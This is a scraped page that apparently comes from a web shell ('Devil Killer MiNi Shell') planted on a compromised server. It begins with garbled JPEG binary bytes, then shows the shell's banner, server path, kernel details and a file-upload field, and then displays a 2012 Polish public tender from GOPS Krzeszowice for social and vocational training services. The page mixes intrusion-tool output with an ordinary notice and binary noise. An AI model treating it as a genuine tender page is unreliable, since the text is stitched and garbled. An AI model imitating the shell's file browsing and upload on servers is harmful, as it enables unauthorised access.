JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/178470-N-2012.html

<p class="kh_header"><b>Krzeszowice: Usługi szkoleniowe dla Beneficjentów Ostatecznych Projektu Systemowego pn. Aktywność daje możliwość. Program Aktywizacji Społecznej i Zawodowej Podopiecznych GOPS Krzeszowice</b><br>
<b>Numer ogłoszenia: 178470 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Kościuszki 43, 32-065 Krzeszowice, woj. małopolskie, tel. 0-12 258 30 80, faks 0-12 258 30 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.krzeszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla Beneficjentów Ostatecznych Projektu Systemowego pn. Aktywność daje możliwość. Program Aktywizacji Społecznej i Zawodowej Podopiecznych GOPS Krzeszowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa realizacja merytoryczna i obsługa techniczno -logistyczna usług szkoleniowych w ramach projektu systemowego pn. Aktywność daje możliwość. Program Aktywizacji Społecznej i Zawodowej Podopiecznych GOPS Krzeszowice.
Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każdy stanowi odrębne zadanie:
 Zadanie 1:  Trening kompetencji społecznych

1. Obowiązki organizacyjne 
a) przeprowadzenie szkoleń dla   grup uczestników wskazanych przez Zamawiającego,
b) zapewnienie sali szkoleniowej na terenie gminy Krzeszowice z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Krzesła tapicerowane, temperatura w sali 21-23°C
c) zapewnienie jednego posiłku ( obiadu  2- daniowego + deseru) dla każdego uczestnika szkolenia  oraz dodatkowo serwisu kawowego z poczęstunkiem ( kawa, herbata, woda, ciastka) podczas szkoleń 2 razy dziennie, 
d) oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów,

Inne obowiązki Wykonawcy:
a) Wykonawca przygotuje szczegółowy program oraz harmonogramu szkolenia, prezentacje multimedialne, certyfikaty/zaświadczenia o ukończeniu szkolenia, 
b) Wykonawca zapewni prelegentów,renerów z kompetencjami do realizacji zadań (prowadzenia warsztatów i  ćwiczeń ) w przedmiotowym zakresie.
c) Wykonawca wystawi uczestnikom szkolenia zaświadczenia/certyfikaty o ukończeniu szkolenia zawierające informację o jego temacie oraz wymiarze godzin, 
d) Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych,
e) Wykonawca obejmie wszystkich uczestników szkolenia oraz osoby z otoczenia ubezpieczeniem od nieszczęśliwych wypadków.
f) Po zakończeniu usługi szkoleniowej Wykonawca przedstawi Zamawiającemu dokumentację szkolenia, na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, dziennik zajęć, informacje o wykonaniu usługi szkoleniowej, oraz 1 komplet materiałów szkoleniowych,
g) Jeżeli zajęcia będą odbywać się poza miejscowością Krzeszowice, wówczas Wykonawca zorganizuje dowóz uczestników na trasie z miejsca zamieszkania - miejsce szkolenia - miejsce zamieszkania- każdego dnia zajęć.


Liczba uczestników  szkolenia wynosi 20 osób 
Liczba godzin dydaktycznych 30h dla każdego uczestnika- szkolenie stacjonarne 
Wymagany termin realizacji szkolenia do 30.06.2012r.
 Zakres merytoryczny: treningi i warsztaty psychologiczne obejmujące następujące zagadnienia:
-	zajęcia integracyjne określające normy i zasady pracy w grupie 
-	nawiązywanie i utrzymywanie kontaktów interpersonalnych
-	komunikacja interpersonalna
-	doskonalenie komunikacji werbalnej i niewerbalnej
-	trening asertywności i redukcji frustracji 
-	samoocena i samorealizacja
-	poczucie własnej wartości
-	osiąganie celów życiowych
-	umiejętności społeczne


Zadanie 2:  Wsparcie grupowe w zakresie podniesienia kompetencji życiowych i umiejętności umożliwiających powrót do życia społecznego w tym powrót na rynek pracy i aktywizację zawodową pn. Trening kompetencji życiowych


1 Obowiązki organizacyjne
a)  Przeprowadzenie szkoleń dla grup uczestników wskazanych przez Zamawiającego,
b)Zapewnienie ośrodka szkoleniowego o standardzie co najmniej  2- gwiazdkowym lub równoważnym zapewniającego zakwaterowanie, wyżywienie oraz sale dydaktyczne  na terenie Beskidu Śląskiego, Sądeckiego, Żywieckiego, Tatr lub Podhala. 

c) zakwaterowanie z zapleczem socjalnym i sanitarnym dla wszystkich osób uczestniczących w szkoleniach. Pokoje 2 lub 3-osobowe z łazienką. Temperatura w pomieszczeniach noclegowych - max. 230 C;
d) sale dydaktyczne z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart) . Krzesła tapicerowane, temperatura w salach 21 - 230C;
e) wyżywienie - 1 dzień szkolenia (obiad, deser, kolacja), 2,3   dzień szkolenia (śniadanie, obiad, deser i kolacja), 4 dzień szkolenia (śniadanie, obiad, deser) oraz dodatkowo serwis kawowy z poczęstunkiem (kawa, herbata, woda, ciastka) podczas szkoleń - 2 razy dziennie; 
f) oznakowanie ośrodka i pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów.
Zapewnienie przejazdu dla wszystkich uczestników szkolenia autokar  na trasie: Krzeszowice - miejsce szkolenia - Krzeszowice.

 Inne obowiązki Wykonawcy:
a) Wykonawca przygotuje szczegółowy program oraz harmonogramu szkolenia, prezentacje multimedialne, certyfikaty/zaświadczenia o ukończeniu szkolenia, 
b) Wykonawca zapewni prelegentów,trenerów z kompetencjami do realizacji zadań (prowadzenia warsztatów i  ćwiczeń) w przedmiotowym zakresie.
c) Wykonawca wystawi uczestnikom szkolenia zaświadczenia,certyfikaty o ukończeniu szkolenia zawierające informację o jego temacie oraz wymiarze godzin, 
d) Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez Zamawiającego wzorem. 
e) Wykonawca obejmie wszystkich uczestników szkolenia ubezpieczeniem od nieszczęśliwych wypadków.
 f) Po zakończeniu usługi szkoleniowej Wykonawca przedstawi Zamawiającemu dokumentację szkolenia, na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, dziennik zajęć, informacje o wykonaniu usługi szkoleniowej. 

Liczba uczestników  szkolenia wynosi 20 osób
Liczba godzin dydaktycznych 24h dla każdego uczestnika w układzie 3 do 4 dni (24h) - szkolenie wyjazdowe
Wymagany termin realizacji szkolenia do 31.08.2011r.
Zakres merytoryczny: podniesienie umiejętności i świadomości  uczestników w 
zakresie :
-	gospodarowania budżetem domowym,
-	radzenia sobie z obowiązkami życia codziennego,
-	zarządzania własnymi pieniędzmi,
-	planowania i realizacji planów,
-	dzielenia się obowiązkami oraz zmiany sposobu myślenia w tym zakresie,
Zadanie 3: Trening pracy  

Obowiązki organizacyjne:
a) przeprowadzenie szkoleń dla   grup uczestników wskazanych przez Zamawiającego,
b) zapewnienie sali szkoleniowej na terenie gminy Krzeszowice z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Krzesła tapicerowane, temperatura w sali 21-23°C
c) zapewnienie jednego posiłku ( obiadu  2- daniowego + deseru) dla każdego uczestnika szkolenia  oraz dodatkowo serwisu kawowego z poczęstunkiem ( kawa, herbata, woda, ciastka) podczas szkoleń 2 razy dziennie, 
d) oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów,
 
 Inne obowiązki Wykonawcy:
a) Wykonawca przygotuje szczegółowy program oraz harmonogram zajęć,  certyfikaty/zaświadczenia o ukończeniu szkolenia, 
b) Wykonawca zapewni prelegentów/trenerów z kompetencjami do realizacji zadań
 ( prowadzenia warsztatów i  ćwiczeń) w przedmiotowym zakresie.
c) Wykonawca wystawi uczestnikom spotkań  zaświadczenia/certyfikaty o ukończeniu zajęć  zawierające informację o ich temacie oraz wymiarze godzin, 
d) Wykonawca przeprowadzi ewaluację zadania - dokona oceny za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez Zamawiającego wzorem. 
e) Wykonawca obejmie wszystkich uczestników zajęć ubezpieczeniem od nieszczęśliwych wypadków.
f) Po zakończeniu usługi   Wykonawca przedstawi Zamawiającemu dokumentację zadania, na którą złożą się: listy obecności, listy potwierdzające odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów, dziennik zajęć, informacja o wykonaniu zadania,
g) Jeżeli zajęcia będą odbywać się poza miejscowością Krzeszowice, wówczas Wykonawca zorganizuje dowóz uczestników na trasie miejsce zamieszkania - miejsce zajęć - miejsce zamieszkania, każdego dnia zajęć.

Liczba uczestników  szkolenia wynosi 20 osób
Liczba godzin dydaktycznych : 24 godziny dla każdego uczestnika- szkolenie stacjonarne 
Wymagany termin realizacji szkolenia do 30.09.2012r. 
Zakres merytoryczny: poszerzenie treningu kompetencji społecznych o umiejętności dotyczące:
-	poszukiwania pracy , 
-	przygotowania i opracowania podstawowych dokumentów tj. życiorys zawodowy i list motywacyjny, 
-	przygotowanie do rozmowy kwalifikacyjnej


Zadanie 4: Indywidualne poradnictwo dla rodzin   
Obowiązki organizacyjne:
a)	zapewnienie sali/pokoju na terenie Krzeszowic, 
b)	zapewnienie serwisu kawowego  z poczęstunkiem dla uczestników ( kawa, herbata, woda, ciastka) podczas spotkań,
c)	 oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów,
Inne obowiązki Wykonawcy:
a)	Wykonawca zapewni trenerów z kompetencjami do realizacji zadania w przedmiotowym zakresie,
b)	Wykonawca wystawi uczestnikom spotkań zaświadczenia/certyfikaty o ukończeniu poradnictwa , zawierające informację o ich temacie oraz wymiarze godzin,
c)	Wykonawca przeprowadzi ewaluację zadania- dokona oceny za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez zamawiającego wzorem,
d)	Wykonawca obejmie wszystkich uczestników zajęć ubezpieczeniem od nieszczęśliwych wypadków ,
e)	Po zakończeniu usługi Wykonawca przedstawi Zamawiającemu dokumentację zadania, na którą złożą się: listy obecności, kopie zaświadczeń/ certyfikatów, listy potwierdzające odbiór materiałów, informacja o wykonaniu zadania.

Liczba uczestników: 20 osób wraz z rodziną
Lica godzin dydaktycznych: średnio 5 godzin dla każdego uczestnika oraz rodziny
Wymagany termin realizacji poradnictwa do 31.10.2012r
Zakres merytoryczny: wsparcie skierowane na poprawę funkcjonowania rodzin, w których funkcjonuje  osoba bezrobotna.

Zadanie 5: Udzielanie informacji o prawach i uprawnieniach osoby bezrobotnej 
Obowiązki organizacyjne:
d)	zapewnienie sali/pokoju na terenie Krzeszowic, 
e)	zapewnienie serwisu kawowego  z poczęstunkiem dla uczestników ( kawa, herbata, woda, ciastka) podczas spotkań,
f)	 oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji  i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów,

Inne obowiązki Wykonawcy:
f)	Wykonawca zapewni trenerów z kompetencjami do realizacji zadania w przedmiotowym zakresie,
g)	Wykonawca wystawi uczestnikom spotkań zaświadczenia,certyfikaty o ukończeniu poradnictwa , zawierające informację o ich temacie oraz wymiarze godzin,
h)	Wykonawca przeprowadzi ewaluację zadania- dokona oceny za pomocą ankiet ewaluacyjnych opracowanych zgodnie z przekazanym przez zamawiającego wzorem,
i)	Wykonawca obejmie wszystkich uczestników zajęć ubezpieczeniem od nieszczęśliwych wypadków ,
j)	Po zakończeniu usługi Wykonawca przedstawi Zamawiającemu dokumentację zadania, na którą złożą się: listy obecności, kopie zaświadczeń/ certyfikatów, listy potwierdzające odbiór materiałów, informacja o wykonaniu zadania.

Liczba uczestników : 20 osób wraz z rodziną 
Liczba godzin dydaktycznych  średnio 5 godzin dla każdego uczestnika oraz rodziny
Zakres merytoryczny: - konsultacje indywidualne dostosowane do potrzeb BO o prawach i uprawnieniach osoby bezrobotnej
Wymagany termin realizacji  zadania  do 30.11.2012r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunków zostanie dokonana, na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg formuły: spełnia, - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunków zostanie dokonana, na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg formuły: spełnia, - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunków zostanie dokonana, na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg formuły: spełnia, - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunków zostanie dokonana, na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg formuły: spełnia, - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunków zostanie dokonana, na podstawie złożonych oświadczeń i dokumentów zgodnie ze SIWZ wg formuły: spełnia, - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może być dokonana w  granicach wyznaczonych przepisami ustawy Pzp, w tym art. 144 ustawy Pzp,  wyłącznie za zgodą obu stron w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Krzeszowice/Wprowadzenie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Krzeszowicach, ul. Kościuszki 43, 32-065 Krzeszowice pokój nr 15 , również na stronie internetowej GOPS: www.gops.krzeszowice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 08:30, miejsce: Gminny Ośrodek Pomocy Społecznej w Krzeszowicach, ul. Kościuszki 43, 32-065 Krzeszowice pokój  nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




